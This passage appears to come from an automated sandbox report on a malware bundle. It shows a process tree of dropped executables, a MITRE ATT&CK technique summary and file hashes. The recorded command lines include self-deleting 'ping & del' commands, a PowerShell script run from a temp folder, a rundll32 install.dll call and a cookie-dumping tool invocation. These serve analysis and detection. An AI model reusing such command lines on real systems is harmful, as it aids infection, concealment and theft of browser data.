                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ujmhvbh.ltw\askinstall39.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7488
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1ujmhvbh.ltw\askinstall39.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1ujmhvbh.ltw\askinstall39.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6352
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cxzuz1ka.suk\y1.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6000
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\cxzuz1ka.suk\y1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\cxzuz1ka.suk\y1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7592
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ieracnq2.km4\setup.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ieracnq2.km4\setup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\ieracnq2.km4\setup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ieracnq2.km4\setup.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ijsuj5l.2ka\toolspab1.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4ijsuj5l.2ka\toolspab1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\4ijsuj5l.2ka\toolspab1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4ijsuj5l.2ka\toolspab1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4ijsuj5l.2ka\toolspab1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\abo1x1yo.vt2\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pk0cdqwo.hsx\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7156
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\pk0cdqwo.hsx\SunLabsPlayer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\pk0cdqwo.hsx\SunLabsPlayer.exe /S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1236
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nseF606.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3168
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6132
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ping 127.0.0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4256
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 989C5DC8A741831C94C81ECAF680B122 C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5604
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding F0E6D54868A8BF4AD5C8A1E4645DAAA1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5476
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 3D76F12B5DCEBF3AD5D90EC313CCDACC E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 3A6C4C9E7645B4518F9B8B71CC31B212 C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5612
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1CC1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1CC1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4C4F.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4C4F.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8068
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2AAD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\2AAD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3748

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  T1518

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  T1018

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Windows Photo Viewer\UDLZNTNMXX\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Windows Photo Viewer\UDLZNTNMXX\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\install.dat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    806c3221a013fec9530762750556c332

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\install.dll
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    9bd290c73c295139470b5a56f8d857bb

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    c838907b18895bc98a601e27c30b5de9acef88e7

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    bfc8f14e57e8fe77f10ec2c420b746a75291c034dd872bc673e459ebfdac5968

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    c8a77182ce1832fe96f35a2816120c9df00eca1aa29dce49a111f057d3583b3b25a69c88f579cc84f4ff43fbf17f663a1e07234aacdd1831bbdb443f8f234e36

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B76882588198CE25BFE5B7B047D867A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    f9d1e5ffc4b7909705704d94aa6a87fe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    dd1102b19254b0f112316e3708bb845cf01adbb5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA256

